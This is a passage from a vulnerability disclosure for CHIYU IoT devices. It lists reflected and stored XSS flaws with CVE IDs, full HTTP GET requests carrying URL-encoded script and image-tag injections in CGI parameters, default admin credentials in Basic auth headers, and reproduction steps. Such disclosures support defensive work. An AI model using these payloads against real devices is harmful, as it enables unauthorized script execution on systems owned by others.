Steps to reproduce:
1. Navigate to the vulnerable device
2. Make a GET request to component mentioned (if.cgi)
3. Append the payload at the end of the vulnerable parameter (TF_submask)
4. Submit the request and observe payload execution
Steps to reproduce:
1. Navigate to the vulnerable device
2. Make a GET request to component mentioned (dhcpc.cgi)
3. Append the payload at the end of the vulnerable parameter (TF_hostname)
4. Submit the request and observe payload execution
GET
/ppp.cgi?redirect=setting.htm&failure=fail.htm&type=ppp_apply&TF_username=admin&TF_password=admin&TF_servicename=%22%3E%3Cscript%3Ealert%28%27123%27%29%3B%3C%2Fscript%3E&TF_idletime=0&L_ipnego=DISABLE&TF_fixip1=&TF_fixip2=&TF_fixip3=&TF_fixip4=&S_type=2&S_baud=3&S_userdefine=0&AP_type=0&TF_port=443&TF_remoteip1=0.0.0.0&B_apply=APPLY
HTTP/1.1
Host: 192.168.187.143
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.187.143/wan_pe.htm
Authorization: Basic OmFkbWlu
Connection: close
Upgrade-Insecure-Requests: 1
Steps to reproduce:
1. Navigate to the vulnerable device
2. Make a GET request to component mentioned (ppp.cgi)
3. Append the payload at the end of the vulnerable parameter
(TF_servicename)
4. Submit the request and observe payload execution
GET
/man.cgi?redirect=setting.htm&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=%22%3E%3Cimg+src%3D%22%23%22%3E&TF_port=%22%3E%3Cimg+src%3D%22%23%22%3E&B_mac_apply=APPLY
HTTP/1.1
Host: 192.168.187.12
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.187.12/manage.htm
Authorization: Basic OmFkbWlu
Connection: close
Upgrade-Insecure-Requests: 1
Steps to reproduce:
1. Navigate to the vulnerable device
2. Make a GET request to component mentioned (man.cgi)
3. Append the payload at the end of the vulnerable parameter (TF_port)
4. Submit the request and observe payload execution
#2: Unauthenticated XSS in several CHIYU IoT devices
CVE ID: CVE-2021-31641
Medium - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N
URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31641
Component: any argument passed via URL that results in an HTTP-404
Payload: http://ip/<script>alert(123)</script>
Steps to reproduce:
1. Navigate to the webpage of the vulnerable device
2. On the web-browsers, you need to append the payload after the IP
address (see payload above)
3. Submit the request and observe payload execution
#3: Stored XSS in CHIYU SEMAC, BF-630, BF-631, and Webpass IoT devices
CVE ID: CVE-2021-31643
Medium - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31643
Steps to reproduce:
1. Navigate to the vulnerable device
2. Make a GET request to component mentioned (if.cgi)
3. Append the payload at the end of the vulnerable parameter (username)
4. Submit the request and observe payload execution